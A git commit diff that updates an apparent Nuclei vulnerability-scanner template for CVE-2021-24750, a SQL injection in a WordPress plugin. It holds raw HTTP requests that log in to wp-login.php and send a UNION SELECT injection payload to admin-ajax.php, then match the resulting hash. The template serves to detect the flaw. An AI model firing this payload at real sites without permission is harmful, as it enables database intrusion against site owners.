Update CVE-2021-24750.yaml

patch-1
Prince Chaddha 2022-01-23 14:51:25 +05:30 committed by GitHub
parent 3c9e02150d
commit 1d15a5464a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 4 additions and 21 deletions

View File

@ -13,47 +13,30 @@ info:
cvss-score: 8.8
cve-id: CVE-2021-24750
cwe-id: CWE-89
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin
tags: cve,cve2021,sqli,wp,wordpress,wp-plugin,authenticated
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Host: {{Hostname}}
Accept-Language: de,en-US;q=0.7,en;q=0.3
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
Origin: http://{{Hostname}}
Upgrade-Insecure-Requests: 1
Cookie: wordpress_test_cookie=WP%20Cookie%20check
Content-Length: 47
Connection: close
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5(24750),4--%20%22%7D HTTP/1.1
GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5('CVE-2021-24750'),4--%20%22%7D HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
payloads:
username:
- user
password:
- user
attack: clusterbomb
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "7efeb6400e09756814e99049835fa47b"
- "266f89556d2b38ff067b580fb305c522"
- type: status
status: